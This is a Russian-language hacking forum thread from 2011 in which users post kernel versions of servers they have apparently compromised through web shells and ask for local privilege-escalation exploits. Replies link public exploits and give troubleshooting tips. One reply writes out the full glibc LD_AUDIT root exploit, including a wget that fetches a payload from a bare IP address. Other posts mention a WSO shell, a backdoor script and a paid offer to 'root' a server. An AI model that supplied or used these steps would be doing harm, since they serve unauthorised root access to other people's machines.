Просмотр полной версии : повышение прав [задай вопрос - получи ответ]
/thread229985.html
http://www.webhostingtalk.com/showthread.php?t=670497
http://www.hackforums.net/showthread.php?tid=658410
эти все пробовал нее
Expl0ited
эти тоже
а этот Ac1db1tch3z vs x86_64 Linux Kernel
вообще скомпилен не правильно под это ядро
надо так
gcc Ac1db1tch3z.c -m32 -o Ac1db1tch3z
Expl0ited
22.08.2011, 19:16
будьте добры, для этого есть что-нибудь?
Linux xxxxx 2.6.18-028stab070.5 #1 SMP Fri Sep 17 15:37:23 MSD 2010 x86_64 x86_64 x86_64 GNU/Linux
попробуй этот пост: #499 (https://antichat.live/showpost.php/p/2801886/postcount/499/)
Expl0ited
эти тоже
а этот Ac1db1tch3z vs x86_64 Linux Kernel
вообще скомпилен не правильно под это ядро
надо так
gcc Ac1db1tch3z.c -m32 -o Ac1db1tch3z
У тебя ноябрь, а роберт ю сак сентябрьский, так что даже и не знаю, что тебе посоветовать.
есть сервер FreeBSD 7.3, но gcc нет - сплойт не запустить? А если скомпилированный бинарник запустить, то будет работать?
есть что нибудь
Linux icpu1521 2.6.28.8-20101130b-iscsi-ntacker-fasync-mremap-amd-sec6-grsec #1 SMP Tue Nov 30 18:27:29 CET 2010 i686 GNU/Linux
Тут же установлен grsec, т.ч. про айсидбитчез и возможно другие сплоеты забудь.
Скинь ls -la /lib/libc*; ls -la /lib/libpc*
Возможно Glibc возьмет (сам не проверял возможность эксплуатации Glibc с установленным grsec, но вроде на эксплуатацию уязвимости с Glibc он повлиять не должен, но повторюсь, я не уверен в этом).
Linux ********** 2.6.18-194.26.1.el5 #1 SMP Tue Nov 9 12:54:20 EST 2010 x86_64 x86_64 x86_64 GNU/Linux
А вот под это попробуй:
http://www.exploit-db.com/exploits/15704/
http://www.exploit-db.com/exploits/15944/
http://www.exploit-db.com/exploits/15916/
Два последних сплоита я сам не тестил, ну и конечно же проверь можно ли взять Glibc'ом.
есть сервер FreeBSD 7.3, но gcc нет - сплойт не запустить? А если скомпилированный бинарник запустить, то будет работать?
Ты троллишь чтоле? =)
gcc только для компиляции, смело запускай из директории которая не под noexec
Кстати под FreeBSD 7.3 советую вот это:
https://rdot.org/forum/showthread.php?t=601
Проверенный сплоит ) Ну это смотря какого года у тебя сборка...
Ты троллишь чтоле? =)
gcc только для компиляции, смело запускай из директории которая не под noexec
Кстати под FreeBSD 7.3 советую вот это:
https://rdot.org/forum/showthread.php?t=601
Проверенный сплоит ) Ну это смотря какого года у тебя сборка...
Я имею ввиду, что если gcc нет на сервере, то не скомпилировать сплойт.
За сплойт спасибо. Сборка 2010 года.
У кого-нибудь есть уже скомпилированный бинарник или скомпилируйте, пожалуйста, этот сплойт https://rdot.org/forum/showthread.php?t=601
P.S. Сплойты под фряху на лине можно компилить?
Linux icpu1521 2.6.28.8-20101130b
-rwxr-xr-x 1 root root 1147548 Jan 21 2010 /lib/libc-2.3.6.so
lrwxrwxrwx 1 root root 13 Sep 15 2010 /lib/libc.so.6 -> libc-2.3.6.so
lrwxrwxrwx 1 root root 14 Sep 15 2010 /lib/libcap.so.1 -> libcap.so.1.10
-rw-r--r-- 1 root root 11024 Apr 14 2004 /lib/libcap.so.1.10
lrwxrwxrwx 1 root root 17 Sep 15 2010 /lib/libcfont.so.0 -> libcfont.so.0.0.0
-rw-r--r-- 1 root root 10644 Sep 5 2006 /lib/libcfont.so.0.0.0
-rw-r--r-- 1 root root 181684 Jan 21 2010 /lib/libcidn-2.3.6.so
lrwxrwxrwx 1 root root 16 Sep 15 2010 /lib/libcidn.so.1 -> libcidn-2.3.6.so
lrwxrwxrwx 1 root root 17 Sep 15 2010 /lib/libcom_err.so.2 -> libcom_err.so.2.1
-rw-r--r-- 1 root root 5820 Dec 6 2007 /lib/libcom_err.so.2.1
lrwxrwxrwx 1 root root 19 Sep 15 2010 /lib/libconsole.so.0 -> libconsole.so.0.0.0
-rw-r--r-- 1 root root 73540 Sep 5 2006 /lib/libconsole.so.0.0.0
-rw-r--r-- 1 root root 21868 Jan 21 2010 /lib/libcrypt-2.3.6.so
lrwxrwxrwx 1 root root 17 Sep 15 2010 /lib/libcrypt.so.1 -> libcrypt-2.3.6.so
lrwxrwxrwx 1 root root 19 Sep 15 2010 /lib/libctutils.so.0 -> libctutils.so.0.0.0
-rw-r--r-- 1 root root 18380 Sep 5 2006 /lib/libctutils.so.0.0.0
-rw-r--r-- 1 root root 5400 Jan 21 2010 /lib/libpcprofile.so
Expl0ited
23.08.2011, 01:11
Linux icpu1521 2.6.28.8-20101130b
-rwxr-xr-x 1 root root 1147548 Jan 21 2010 /lib/libc-2.3.6.so
lrwxrwxrwx 1 root root 13 Sep 15 2010 /lib/libc.so.6 -> libc-2.3.6.so
lrwxrwxrwx 1 root root 14 Sep 15 2010 /lib/libcap.so.1 -> libcap.so.1.10
-rw-r--r-- 1 root root 11024 Apr 14 2004 /lib/libcap.so.1.10
lrwxrwxrwx 1 root root 17 Sep 15 2010 /lib/libcfont.so.0 -> libcfont.so.0.0.0
-rw-r--r-- 1 root root 10644 Sep 5 2006 /lib/libcfont.so.0.0.0
-rw-r--r-- 1 root root 181684 Jan 21 2010 /lib/libcidn-2.3.6.so
lrwxrwxrwx 1 root root 16 Sep 15 2010 /lib/libcidn.so.1 -> libcidn-2.3.6.so
lrwxrwxrwx 1 root root 17 Sep 15 2010 /lib/libcom_err.so.2 -> libcom_err.so.2.1
-rw-r--r-- 1 root root 5820 Dec 6 2007 /lib/libcom_err.so.2.1
lrwxrwxrwx 1 root root 19 Sep 15 2010 /lib/libconsole.so.0 -> libconsole.so.0.0.0
-rw-r--r-- 1 root root 73540 Sep 5 2006 /lib/libconsole.so.0.0.0
-rw-r--r-- 1 root root 21868 Jan 21 2010 /lib/libcrypt-2.3.6.so
lrwxrwxrwx 1 root root 17 Sep 15 2010 /lib/libcrypt.so.1 -> libcrypt-2.3.6.so
lrwxrwxrwx 1 root root 19 Sep 15 2010 /lib/libctutils.so.0 -> libctutils.so.0.0.0
-rw-r--r-- 1 root root 18380 Sep 5 2006 /lib/libctutils.so.0.0.0
-rw-r--r-- 1 root root 5400 Jan 21 2010 /lib/libpcprofile.so
Сделай df -h и если дира /tmp не смонтирована в другом разделе, то всё ок можешь приступать к:
$ mkdir /tmp/exploit
$ ln /bin/ping /tmp/exploit/target
$ exec 3 /tmp/exploit/target*
$ rm -rf /tmp/exploit/
$ ls -l /proc/$$/fd/3
lr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target (deleted)
$ wget -O /tmp/payload.c http://194.105.208.43/payload.c
$ gcc -w -fPIC -shared -o /tmp/exploit /tmp/payload.c
$ ls -l /tmp/exploit
-rwxrwx--- 1 taviso taviso 4.2K Oct 15 09:22 /tmp/exploit*
$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
sh-4.1# whoami
root
sh-4.1# id
uid=0(root) gid=500(taviso)
(c) http://www.opennet.ru/opennews/art.shtml?num=28338
Если не выйдет, то что же, заюзай: http://blog.nibbles.fr/2230
Сделай df -h и если дира /tmp не смонтирована в другом разделе, то всё ок можешь приступать к:
df -h
Filesystem Size Used Avail Use% Mounted on
/dev/sda7 3.7G 1.5G 2.1G 41% /
/dev/sdb 933G 588G 346G 64% /homepages
что это дает
Expl0ited
23.08.2011, 01:27
df -h
Filesystem Size Used Avail Use% Mounted on
/dev/sda7 3.7G 1.5G 2.1G 41% /
/dev/sdb 933G 588G 346G 64% /homepages
что это дает
Всё нормально, пробуй.
Всё нормально, пробуй.
в tmp каталог exploit создался но при вводе
ln /bin/ping /tmp/exploit/target
ln: creating hard link `/tmp/exploit/target' to `/bin/ping': Invalid cross-device link
Expl0ited
23.08.2011, 01:36
в tmp каталог exploit создался но при вводе
ln /bin/ping /tmp/exploit/target
ln: creating hard link `/tmp/exploit/target' to `/bin/ping': Invalid cross-device link
Значит ты находишься тут /dev/sdb, а система /dev/sda7
И соответственно ничего не выйдет.
Значит ты находишься тут /dev/sdb, а система /dev/sda7
И соответственно ничего не выйдет.
((
Что я делаю не так (Glibs)
ввожу:
LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
дает ошибку
и моя консоль уходит в даун
http://jpg1.ru/w/2011/8/24/e2ae7b1a43279cf377682ec5f53c84598ed950a0352bdf2597 4dc0cd.jpg
Linux thrashers 2.6.32.8-grsec-2.1.14-modsign-xeon-64 #2 SMP Sat Mar 13 00:42:43 PST 2010 x86_64
Что под это чудо посоветуете?)
Linux 2.6.18-238.19.1.el5.028stab092.2 #1 SMP Thu Jul 21 19:23:22 MSD 2011 i686
FreeBSD 7.3-amd64-20100831 amd64 at
Linux 2.6.35.7-grsecnew #1 SMP Mon Dec 13 08:34:39 CST 2010 x86_64
Хотя бы под одну, есть что нибудь?
Хотя бы под одну, есть что нибудь?
Под первое и 3-е однозначно ничего нет.
][imer said:
Linux 2.6.18-238.19.1.el5.028stab092.2 #1 SMP Thu Jul 21 19:23:22 MSD 2011 i686
FreeBSD 7.3-amd64-20100831 amd64 at
Linux 2.6.35.7-grsecnew #1 SMP Mon Dec 13 08:34:39 CST 2010 x86_64
Хотя бы под одну, есть что нибудь?
нет.
][imer said:
Linux 2.6.18-238.19.1.el5.028stab092.2 #1 SMP Thu Jul 21 19:23:22 MSD 2011 i686
FreeBSD 7.3-amd64-20100831 amd64 at
Linux 2.6.35.7-grsecnew #1 SMP Mon Dec 13 08:34:39 CST 2010 x86_64
Хотя бы под одну, есть что нибудь?
FreeBSD 7.3-amd64-20100831 amd64 at
https://rdot.org/forum/showthread.php?t=601
Linux 2.6.35.7-grsecnew #1 SMP Mon Dec 13 08:34:39 CST 2010 x86_64
glibs
Expl0ited
25.08.2011, 21:01
Что я делаю не так (Glibs)
ввожу:
LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
дает ошибку
и моя консоль уходит в даун
http://jpg1.ru/w/2011/8/24/e2ae7b1a43279cf377682ec5f53c84598ed950a0352bdf2597 4dc0cd.jpg
Скорее всего пропатчен.
Что я делаю не так (Glibs)
ввожу:
LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
дает ошибку
и моя консоль уходит в даун
Создай sh-файл, пихни туда "LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3", выполни sh-файл, тогда консолька не вылетит, но скорее всего это патч.
Linux thrashers 2.6.32.8-grsec-2.1.14-modsign-xeon-64 #2 SMP Sat Mar 13 00:42:43 PST 2010 x86_64
Что под это чудо посоветуете?)
Мог подойти Ac1dB1tch3z, но врятли возьмет из-за grsec: http://www.exploit-db.com/exploits/15024/
Ну а так дай вывод: ls -la /lib/libc* ; ls -la /lib/libpc* ; df -h
][imer said:
Linux 2.6.18-238.19.1.el5.028stab092.2 #1 SMP Thu Jul 21 19:23:22 MSD 2011 i686
Может быть библиотеки Glibc бажные, покажи вывод команды: ls -la /lib/libc* ; ls -la /lib/libpc* ; df -h
][imer said:
Linux 2.6.35.7-grsecnew #1 SMP Mon Dec 13 08:34:39 CST 2010 x86_64
Попробуй это: http://www.exploit-db.com/exploits/15944/, но врятли, ну а так тоже есть шанс взять Glibc'ом...
Мог подойти Ac1dB1tch3z, но врятли возьмет из-за grsec: http://www.exploit-db.com/exploits/15024/
Ac1dB1tch3z не идет...точнее с компиляцией проблема, а точнее вообщем такие ерроры
Сразу при компиляции сплоита была ошибка :
norm.c:62:2: error: #error r34d th3 c0d3 m0r0n !! # <> #
Удалил из сплоита строчку : #error r34d th3 c0d3 m0r0n !! # <> #
попробовал скомпилить и получил такой erro
http://s008.radikal.ru/i306/1108/2a/2ed4a3413440.png
мб у кого нить есть скомпиленный этот сплойт? "Ac1dB1tch3z"
Ну а так дай вывод: ls -la /lib/libc* ; ls -la /lib/libpc* ; df -h
$ ls -la /lib/libc* ; ls -la /lib/libpc* ; df -h
-rwxr-xr-x 1 root root 1375536 Jan 7 2011 /lib/libc-2.7.so
lrwxrwxrwx 1 root root 11 Jan 12 2011 /lib/libc.so.6 -> libc-2.7.so
lrwxrwxrwx 1 root root 14 May 28 2010 /lib/libcap.so.1 -> libcap.so.1.10
-rw-r--r-- 1 root root 14880 Mar 16 2006 /lib/libcap.so.1.10
lrwxrwxrwx 1 root root 14 May 28 2010 /lib/libcap.so.2 -> libcap.so.2.11
-rw-r--r-- 1 root root 16976 Jul 26 2008 /lib/libcap.so.2.11
lrwxrwxrwx 1 root root 17 May 28 2010 /lib/libcfont.so.0 -> libcfont.so.0.0.0
-rw-r--r-- 1 root root 12776 Apr 15 2008 /lib/libcfont.so.0.0.0
-rw-r--r-- 1 root root 190760 Jan 7 2011 /lib/libcidn-2.7.so
lrwxrwxrwx 1 root root 14 Jan 12 2011 /lib/libcidn.so.1 -> libcidn-2.7.so
lrwxrwxrwx 1 root root 17 May 28 2010 /lib/libcom_err.so.2 -> libcom_err.so.2.1
-rw-r--r-- 1 root root 11648 Oct 12 2008 /lib/libcom_err.so.2.1
lrwxrwxrwx 1 root root 19 May 28 2010 /lib/libconsole.so.0 -> libconsole.so.0.0.0
-rw-r--r-- 1 root root 140840 Apr 15 2008 /lib/libconsole.so.0.0.0
-rw-r--r-- 1 root root 39112 Jan 7 2011 /lib/libcrypt-2.7.so
lrwxrwxrwx 1 root root 15 Jan 12 2011 /lib/libcrypt.so.1 -> libcrypt-2.7.so
lrwxrwxrwx 1 root root 19 May 28 2010 /lib/libctutils.so.0 -> libctutils.so.0.0.0
-rw-r--r-- 1 root root 21024 Apr 15 2008 /lib/libctutils.so.0.0.0
-rw-r--r-- 1 root root 6192 Jan 7 2011 /lib/libpcprofile.so
Filesystem Size Used Avail Use% Mounted on
/dev/sda1 60G 49G 8.1G 86% /
tmpfs 7.9G 0 7.9G 0% /lib/init/rw
tmpfs 7.9G 0 7.9G 0% /dev/shm
/dev/sda2 3.8G 180M 3.4G 5% /tmp
/dev/sda6 92M 5.6M 81M 7% /var/spool/cron/crontabs
/dev/sdb1 3.6T 3.0T 601G 84% /home
Ac1dB1tch3z не идет...точнее с компиляцией проблема, а точнее вообщем такие ерроры
Сразу при компиляции сплоита была ошибка :
norm.c:62:2: error: #error r34d th3 c0d3 m0r0n !! # <> #
Удалил из сплоита строчку : #error r34d th3 c0d3 m0r0n !! # <> #
попробовал скомпилить и получил такой erro
http://s008.radikal.ru/i306/1108/2a/2ed4a3413440.png
мб у кого нить есть скомпиленный этот сплойт? "
Ac1dB1tch3z
"
$ ls -la /lib/libc* ; ls -la /lib/libpc* ; df -h
-rwxr-xr-x 1 root root 1375536 Jan 7 2011 /lib/libc-2.7.so
lrwxrwxrwx 1 root root 11 Jan 12 2011 /lib/libc.so.6 -> libc-2.7.so
lrwxrwxrwx 1 root root 14 May 28 2010 /lib/libcap.so.1 -> libcap.so.1.10
-rw-r--r-- 1 root root 14880 Mar 16 2006 /lib/libcap.so.1.10
lrwxrwxrwx 1 root root 14 May 28 2010 /lib/libcap.so.2 -> libcap.so.2.11
-rw-r--r-- 1 root root 16976 Jul 26 2008 /lib/libcap.so.2.11
lrwxrwxrwx 1 root root 17 May 28 2010 /lib/libcfont.so.0 -> libcfont.so.0.0.0
-rw-r--r-- 1 root root 12776 Apr 15 2008 /lib/libcfont.so.0.0.0
-rw-r--r-- 1 root root 190760 Jan 7 2011 /lib/libcidn-2.7.so
lrwxrwxrwx 1 root root 14 Jan 12 2011 /lib/libcidn.so.1 -> libcidn-2.7.so
lrwxrwxrwx 1 root root 17 May 28 2010 /lib/libcom_err.so.2 -> libcom_err.so.2.1
-rw-r--r-- 1 root root 11648 Oct 12 2008 /lib/libcom_err.so.2.1
lrwxrwxrwx 1 root root 19 May 28 2010 /lib/libconsole.so.0 -> libconsole.so.0.0.0
-rw-r--r-- 1 root root 140840 Apr 15 2008 /lib/libconsole.so.0.0.0
-rw-r--r-- 1 root root 39112 Jan 7 2011 /lib/libcrypt-2.7.so
lrwxrwxrwx 1 root root 15 Jan 12 2011 /lib/libcrypt.so.1 -> libcrypt-2.7.so
lrwxrwxrwx 1 root root 19 May 28 2010 /lib/libctutils.so.0 -> libctutils.so.0.0.0
-rw-r--r-- 1 root root 21024 Apr 15 2008 /lib/libctutils.so.0.0.0
-rw-r--r-- 1 root root 6192 Jan 7 2011 /lib/libpcprofile.so
Filesystem Size Used Avail Use% Mounted on
/dev/sda1 60G 49G 8.1G 86% /
tmpfs 7.9G 0 7.9G 0% /lib/init/rw
tmpfs 7.9G 0 7.9G 0% /dev/shm
/dev/sda2 3.8G 180M 3.4G 5% /tmp
/dev/sda6 92M 5.6M 81M 7% /var/spool/cron/crontabs
/dev/sdb1 3.6T 3.0T 601G 84% /home
В комменте сплойта асидбитчес написано что обход защиты грсек умышленно был удалён!
а по поводу не коммпилится, там код с сплойта удалять не нужно...т.к. у вас не ерор а скорее защита от дурака...
при компиляции сплойта добавьте флаг -m32 и будет вам счастье
MisterGood
26.08.2011, 06:03
Перечитал всю тему, но не нашел. Что есть под это:
Linux 2.6.18-028stab070.7 #1 SMP Fri Oct 1 13:53:00 MSD 2010 i686 i686 i386 GNU/Linux
Много чего из этой темы пробовал ничего не идет. GCC есть
Запросил ls -la /boot
Получил:
total 8
drwxr-xr-x 2 root root 4096 Apr 17 2007 .
drwxr-xr-x 20 root root 4096 Jul 30 02:30 ..
BUGAGAlter
26.08.2011, 06:23
вот:
Linux 2.6.20-1.2948.fc6 #1 SMP Fri Apr 27 19:48:40 EDT 2007 i686
и вот:
FreeBSD 4.11-STABLE FreeBSD 4.11-STABLE #0: Mon Mar i386
вот:
Linux 2.6.20-1.2948.fc6 #1 SMP Fri Apr 27 19:48:40 EDT 2007 i686
и вот:
FreeBSD 4.11-STABLE FreeBSD 4.11-STABLE #0: Mon Mar i386
Уж для первого ядра могли бы и сами найти сплоет...
enlightenment (http://www.exploit-db.com/exploits/9627/) вот что тебе нужно.
На счет второго - хз. Зависит от даты сборки. Если до 2006 то можно хэш пасса рута узнать этим (http://www.securitylab.ru/poc/261629.php).
...покажи вывод команды: ls -la /lib/libc* ; ls -la /lib/libpc* ; df -h
Linux 2.6.18-238.19.1.el5.028stab092.2 #1 SMP Thu Jul 21 19:23:22 MSD 2011 i686
$ ls -la /lib/libc* ; ls -la /lib/libpc* ; df -h
-rwxr-xr-x 1 root root 1686224 Oct 26 2010 /lib/libc-2.5.so
lrwxrwxrwx 1 root root 11 Nov 22 2010 /lib/libc.so.6 -> libc-2.5.so
lrwxrwxrwx 1 root root 14 Nov 22 2010 /lib/libcap.so.1 -> libcap.so.1.10
-rwxr-xr-x 1 root root 10184 Mar 14 2007 /lib/libcap.so.1.10
-rwxr-xr-x 1 root root 191708 Oct 26 2010 /lib/libcidn-2.5.so
lrwxrwxrwx 1 root root 14 Nov 22 2010 /lib/libcidn.so.1 -> libcidn-2.5.so
lrwxrwxrwx 1 root root 17 Nov 22 2010 /lib/libcom_err.so.2 -> libcom_err.so.2.1
-rwxr-xr-x 1 root root 6300 Nov 11 2010 /lib/libcom_err.so.2.1
-rwxr-xr-x 1 root root 43616 Oct 26 2010 /lib/libcrypt-2.5.so
lrwxrwxrwx 1 root root 15 Nov 22 2010 /lib/libcrypt.so.1 -> libcrypt-2.5.so
-rwxr-xr-x 1 root root 1295424 Mar 27 2010 /lib/libcrypto.so.0.9.8e
lrwxrwxrwx 1 root root 19 Nov 22 2010 /lib/libcrypto.so.6 -> libcrypto.so.0.9.8e
lrwxrwxrwx 1 root root 16 Nov 22 2010 /lib/libpcre.so.0 -> libpcre.so.0.0.1
-rwxr-xr-x 1 root root 117448 Nov 30 2007 /lib/libpcre.so.0.0.1
Filesystem Size Used Avail Use% Mounted on
/dev/simfs 30G 9.3G 21G 31% /
none 512M 4.0K 512M 1% /dev
Linux 2.6.35.7-grsecnew #1 SMP Mon Dec 13 08:34:39 CST 2010 x86_64
$ ls -la /lib/libc* ; ls -la /lib/libpc* ; df -h
-rwxr-xr-x 1 root root 1689640 Oct 25 2010 /lib/libc-2.5.so
lrwxrwxrwx 1 root root 11 Nov 2 2010 /lib/libc.so.6 -> libc-2.5.so
lrwxrwxrwx 1 root root 14 Sep 17 2009 /lib/libcap.so.1 -> libcap.so.1.10
-rwxr-xr-x 1 root root 11560 Mar 14 2007 /lib/libcap.so.1.10
-rwxr-xr-x 1 root root 191708 Oct 25 2010 /lib/libcidn-2.5.so
lrwxrwxrwx 1 root root 14 Nov 2 2010 /lib/libcidn.so.1 -> libcidn-2.5.so
lrwxrwxrwx 1 root root 17 Nov 6 2009 /lib/libcom_err.so.2 -> libcom_err.so.2.1
-rwxr-xr-x 1 root root 7748 Sep 3 2009 /lib/libcom_err.so.2.1
-rwxr-xr-x 1 root root 45432 Oct 25 2010 /lib/libcrypt-2.5.so
lrwxrwxrwx 1 root root 15 Nov 2 2010 /lib/libcrypt.so.1 -> libcrypt-2.5.so
-rwxr-xr-x 1 root root 1296964 Dec 15 2010 /lib/libcrypto.so.0.9.8e
lrwxrwxrwx 1 root root 14 Sep 17 2009 /lib/libcrypto.so.4 -> libcrypto.so.6
lrwxrwxrwx 1 root root 19 Dec 16 2010 /lib/libcrypto.so.6 -> libcrypto.so.0.9.8e
Filesystem Size Used Avail Use% Mounted on
/dev/sda5 878G 739G 95G 89% /
none 4.0G 4.4M 3.9G 1% /dev/shm
/dev/sda1 130M 56M 74M 43% /boot
/usr/tmpDSK 2.0G 507M 1.4G 28% /tmp
164.154.10.10:/home/cl38
2.7T 2.2T 384G 86% /backup
Jul 21 19:23:22 MSD 2011
ха,смешно!
Linux 2.6.35.7-grsecnew #1 SMP Mon Dec 13 08:34:39 CST 2010 x86_64
грсек?декабрь 10 года.незнам незнам.думаю что больше нет,чем да.
MisterGood
26.08.2011, 18:07
Перечитал всю тему, но не нашел. Что есть под это:
Linux 2.6.18-028stab070.7 #1 SMP Fri Oct 1 13:53:00 MSD 2010 i686 i686 i386 GNU/Linux
Много чего из этой темы пробовал ничего не идет. GCC есть
Запросил ls -la /boot
Получил:
total 8
drwxr-xr-x 2 root root 4096 Apr 17 2007 .
drwxr-xr-x 20 root root 4096 Jul 30 02:30 ..
Если это нужно, то вот еще вывод команды ls -la /lib/libc* ; ls -la /lib/libpc* ; df -h
-rwxr-xr-x 1 root root 1670312 Jul 8 2007 /lib/libc-2.6.so
lrwxrwxrwx 1 root root 11 Mar 19 2008 /lib/libc.so.6 -> libc-2.6.so
lrwxrwxrwx 1 root root 14 Mar 19 2008 /lib/libcap.so.1 -> libcap.so.1.10
-rwxr-xr-x 1 root root 9952 Feb 24 2007 /lib/libcap.so.1.10
-rwxr-xr-x 1 root root 191700 Jul 8 2007 /lib/libcidn-2.6.so
lrwxrwxrwx 1 root root 14 Mar 19 2008 /lib/libcidn.so.1 -> libcidn-2.6.so
lrwxrwxrwx 1 root root 17 Mar 19 2008 /lib/libcom_err.so.2 -> libcom_err.so.2.1
-rwxr-xr-x 1 root root 7600 Dec 12 2007 /lib/libcom_err.so.2.1
-rwxr-xr-x 1 root root 26056 Jul 8 2007 /lib/libcrypt-2.6.so
lrwxrwxrwx 1 root root 15 Mar 19 2008 /lib/libcrypt.so.1 -> libcrypt-2.6.so
-rwxr-xr-x 1 root root 1241516 Oct 12 2007 /lib/libcrypto.so.0.9.8b
lrwxrwxrwx 1 root root 19 Mar 19 2008 /lib/libcrypto.so.6 -> libcrypto.so.0.9.8b
lrwxrwxrwx 1 root root 16 Mar 19 2008 /lib/libpcre.so.0 -> libpcre.so.0.0.1
-rwxr-xr-x 1 root root 158944 Feb 15 2008 /lib/libpcre.so.0.0.1
Filesystem Size Used Avail Use% Mounted on
/dev/vzfs 10G 7.4G 2.7G 74% /
none 16G 4.0K 16G 1% /dev
2.6.18-194.3.1.el5PAE #1 SMP Sun May 2 04:42:25 EDT 2010
чем можно порутать? Enlightment не сработал
чем порутать?
Если система x64 то:
http://www.multiupload.com/OHQFW20FR8
Если i686 то забей. не пробьёшь.
Если система x64 то:
http://www.multiupload.com/OHQFW20FR8
Если i686 то забей. не пробьёшь.
А, при копировании uname не довел мышку до конца
i686 к сожалению.
MisterGood, у тебя виртуалка((
попугай,пробуй все,что есть.Начиная с энлайтмента и до глибца.
MisterGood
27.08.2011, 05:07
Помогите на такой найти:
Linux 2.6.18-194.11.1.el5 #1 SMP Tue Aug 10 19:05:06 EDT 2010 x86_64
PS как узнать, сервер виртуальный или нет?
Помогите на такой найти:
Linux 2.6.18-194.11.1.el5 #1 SMP Tue Aug 10 19:05:06 EDT 2010 x86_64
/showpost.php?p=2807654&postcount=530
SergioBlog
27.08.2011, 14:40
Linux 2.6.21.7-2.fc8xen #1 SMP Fri Feb 15 12:39:36 EST 2008 i686
Есть что-то по такому ядру?
Strilo4ka
27.08.2011, 14:45
Linux 2.6.21.7-2.fc8xen #1 SMP Fri Feb 15 12:39:36 EST 2008 i686
Есть что-то по такому ядру?
пробуйте Linux vmsplice Local Root Exploit
Кто может помочь отрутить сервак за WMZ?
Моя ICQ 13-389-238
FreeBSD 7.1-RELEASE #0: Thu Jan 1 14:37:25 UTC 2009
Хочу хорошего помощника
MisterGood
27.08.2011, 17:20
Подскажите, что делаю не так. Есть шелл WSO, я пытаюсь через его консоль запустить файл backdoor.pl (на другом серваке все работало). Но немогу подключится через netcat для windows. Что я не так делаю?
/showpost.php?p=2807654&postcount=530
Я его запускаю, но что-то не получается, вот что выводится:
[32mAc1dB1tCh3z [0mVS Linux kernel 2.6 kernel 0d4y
$$$ Kallsyms +r
$$$ K3rn3l r3l3as3: 2.6.18-194.11.1.el5
??? Trying the F0PPPPPPPPPPPPPPPPpppppppppp_____ m3th34d
$$$ L00k1ng f0r kn0wn t4rg3tz..
$$$ c0mput3r 1z aqu1r1ng n3w t4rg3t...
$$$ selinux_ops->ffffffff80327ac0
$$$ dummy_security_ops->ffffffff804b9540
$$$ capability_ops->ffffffff80329380
$$$ selinux_enforcing->ffffffff804bc2a0
$$$ audit_enabled->ffffffff804a7124
$$$ Bu1ld1ng r1ngzer0c00l sh3llc0d3 - F0PZzzZzZZ/LSD(M) m3th34d
$$$ Prepare: m0rn1ng w0rk0ut b1tch3z
$$$ Us1ng st4nd4rd s3ash3llz
$$$ 0p3n1ng th3 m4giq p0rt4l
!!! y0u fuq1ng f41l. g3t th3 fuq 0ut!
Я с *nix системами мало знаком, что это означает?
HAXTA4OK
28.08.2011, 06:05
Linux 2.6.32.26 #1 SMP Thu Dec 9 15:33:24 UTC 2010 x86_64
MisterGood
28.08.2011, 07:50
Помогите плз, не могу скомпилировать эксплойт под FreeBSD 8.1
линк (http://www.exploit-db.com/search/?action=search&filter_description=FreeBSD+8.1)
Linux 2.6.32.26 #1 SMP Thu Dec 9 15:33:24 UTC 2010 x86_64
пробуй этот
http://pastebin.com/9MHneaFf
оно взяло мартовскую сборку, у тебя декабрь, может быть повезет..
FreeBSD megashare.by 7.0-RELEASE FreeBSD 7.0-RELEASE #0: Sun Feb 24 19:59:52 UTC 2008 root@logan.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC i386
Пробовал http://securityvulns.ru/files/w00t.sh
Но, увы ./w00t.sh: not found сплоит не рабочий или это я что-то не так делаю?
FreeBSD megashare.by 7.0-RELEASE FreeBSD 7.0-RELEASE #0: Sun Feb 24 19:59:52 UTC 2008 root@logan.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC i386
Пробовал http://securityvulns.ru/files/w00t.sh
Но, увы ./w00t.sh: not found сплоит не рабочий или это я что-то не так делаю?
Ты не так делаешь...
+ на папке скорей всего ноехес стоит
Ты не так делаешь...
+ на папке скорей всего ноехес стоит
Что именно не так я делаю?
Как проверить стоит ли noexec?
Перехожу в папку /tmp ввожу id, получаю uid=80(www) gid=80(www) groups=80(www)
Нету noexec...
Что именно не так я делаю?
Как проверить стоит ли noexec?
Перехожу в папку /tmp ввожу id, получаю uid=80(www) gid=80(www) groups=80(www)
Нету noexec...
Какая связь между вводом стандартной команды и выполнением неизвестного системе файла ?
Положи в другую папку файл sh, дай ему права(chmod +x file_name.sh) а потом выполняй...если всё равно не получится, то выполни действия скрипта вручную...
MisterGood
05.09.2011, 16:58
Помогите под этот найти
$ uname -a
Linux 2.6.35 #1 SMP Tue Oct 26 17:00:09 CEST 2010 x86_64 x86_64 x86_64 GNU/Linux
И еще вопрос, почему когда я хочу выполнить некоторые команды в консоли, появляется вот такое сообщение:
Query did not return anything
если вы с шелла (бэкк-бинд не )при компиляции сплоита при переходе на другую папку права теряются(если вы про это)
попробуй этот шелл
http://files.mail.ru/8ZQK7S
extrimportal
06.09.2011, 11:49
А посоветуйте чё нить пожалуйста под
FreeBSD 6.0-RELEASE #0: Thu Mar 16 22:40:51 GET 2006
А то как увидел что консоль работает, глазам не поверил)
А посоветуйте чё нить пожалуйста под
FreeBSD 6.0-RELEASE #0: Thu Mar 16 22:40:51 GET 2006
А то как увидел что консоль работает, глазам не поверил)
можно эти попробовать
http://securityreason.com/securityalert/8124
http://www.securitylab.ru/poc/extra/275397.php
или здесь поискать
http://www.xakep.ru/local/search/search.asp?text=%FD%EA%F1%EF%EB%EE%E8%F2&p=3
extrimportal
07.09.2011, 10:24
на первый получаю только
[+] mmapping null page
[+] adding jmp to pwnage in null page
[+] opening netgraph socket
на второй вообще тихо. Еще варианты есть?
Linux 2.6.18-92.el5 #1 SMP Tue Apr 29 13:16:15 EDT 2008 x86_64
Что для этого выбрать?
Linux web3a 2.6.32-32-server #62-Ubuntu SMP Wed Apr 20 22:07:43 UTC 2011 x86_64
Помогите подобрать под это.
Linux *** 2.6.18-92.el5 #1 SMP Tue Jun 10 18:51:06 EDT 2008 x86_64 x86_64 x86_64 GNU/Linux есть что-нибудь?
